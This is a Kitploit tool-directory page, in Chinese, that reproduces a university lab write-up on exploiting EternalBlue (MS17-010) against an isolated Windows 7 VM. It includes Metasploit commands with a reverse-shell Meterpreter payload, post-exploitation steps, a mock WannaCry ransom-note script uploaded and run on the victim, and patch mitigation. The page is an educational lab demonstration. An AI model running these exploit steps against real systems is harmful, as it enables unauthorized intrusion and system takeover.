Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EternalBlue-Exploit-Demonstration — 演示如何通过 Metasploit 利用 CVE-2017-0144(EternalBlue)漏洞攻击易受攻击的 Windows 7 虚拟机的网络安全实验室,并通过 Meterpreter 获取 SYSTEM 级访问权限。包含完整攻击链、后渗透利用以及通过 MS17-010 补丁实施的缓解措施,已在隔离的道德实验室环境中完成测试。 | Kitploit
工具/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
漏洞利用框架Payload生成漏洞分析漏洞利用后渗透利用恶意软件分析CTF渗透测试学习与教育红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
实验室与实践
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

演示如何通过 Metasploit 利用 CVE-2017-0144(EternalBlue)漏洞攻击易受攻击的 Windows 7 虚拟机的网络安全实验室,并通过 Meterpreter 获取 SYSTEM 级访问权限。包含完整攻击链、后渗透利用以及通过 MS17-010 补丁实施的缓解措施,已在隔离的道德实验室环境中完成测试。

查看仓库
3个月前尚未审核

EternalBlue 漏洞利用演示 (MS17-010)

网络安全实验,演示使用 Metasploit 对存在漏洞的 Windows 7 系统利用 CVE-2017-0144 (EternalBlue) 进行攻击,并通过 Meterpreter 获得 SYSTEM 级别访问权限。

本项目还模拟了类似 WannaCry 的勒索软件攻击(安全演示),并演示了如何使用 MS17-010 安全补丁进行缓解。


模块信息

模块: CSCM828 安全漏洞与渗透测试

学生:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

大学: 斯旺西大学


资源与下载

  1. MS17-010 EternalBlue SMB 远程 Windows 内核池损坏
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212(Windows 7 x64 安全更新)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux(虚拟机下载)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 家庭高级版 英文 x64(ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. 概述

本实验演示:

  • 远程利用 SMB 漏洞 (MS17-010)
  • 通过 EternalBlue 获得内核级访问权限
  • 建立 Meterpreter 会话
  • 后渗透利用技术
  • 模拟类似 WannaCry 的勒索软件(安全)
  • 通过打补丁进行缓解

2. 实验环境

要求

  • VMware Workstation / VirtualBox
  • 最低 8GB 内存

攻击机

  • Kali Linux
  • Metasploit Framework

受害机

  • Windows 7 SP1 x64(未打补丁)

网络

  • 仅主机模式 / NAT(隔离环境)
  • 确保两台机器之间可以通信

⚠️ 本实验必须在完全隔离的环境中进行。


3. 受害机设置(Windows 7)

在管理员命令提示符中运行:

禁用防火墙

root@kitploit:~
netsh advfirewall set allprofiles state off

验证 SMB 端口

root@kitploit:~
netstat -an | findstr :445

禁用更新(以保证实验稳定性)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. 攻击机设置(Kali Linux)

验证连通性

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. 漏洞利用步骤

第 1 步:扫描目标

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

预期结果:

  • 主机存在漏洞 (VULNERABLE)

第 2 步:运行漏洞利用

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

第 3 步:确认访问权限

root@kitploit:~
meterpreter > getuid

预期结果:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. 后渗透利用

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

稳定迁移

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry 模拟(安全演示)

创建载荷(Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

上传并执行

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. 缓解措施(补丁演示)

第 1 步:下载补丁

  • 访问:https://www.catalog.update.microsoft.com/
  • 搜索:KB4012212 Windows 7 x64
  • 下载 .msu 文件

第 2 步:安装补丁

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

第 3 步:重启

root@kitploit:~
shutdown /r /t 0

第 4 步:验证补丁

root@kitploit:~
systeminfo | findstr KB4012212

第 5 步:重新运行漏洞利用

预期结果:

  • 漏洞利用失败
  • 无 Meterpreter 会话

第 6 步:使用 Nmap 验证

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

预期结果:

  • 不存在漏洞 (NOT VULNERABLE)

9. 故障排除

问题解决方案
漏洞利用失败检查连接
无会话禁用防火墙
会话中断重试漏洞利用
无可见窗口迁移到 explorer.exe

10. 伦理考量

本项目是在以下条件下进行的:

  • 仅在受控的实验机器上
  • 在完全隔离的网络中
  • 仅用于教育目的

未经授权的使用违反:

  • 英国 1990 年《计算机滥用法案》

11. 结论

本实验演示了:

  • 使用 EternalBlue 进行真实世界的 SMB 漏洞利用
  • 获得 Windows 7 的 SYSTEM 级别控制权
  • 勒索软件攻击模拟(安全)
  • 及时打补丁的重要性
下载工具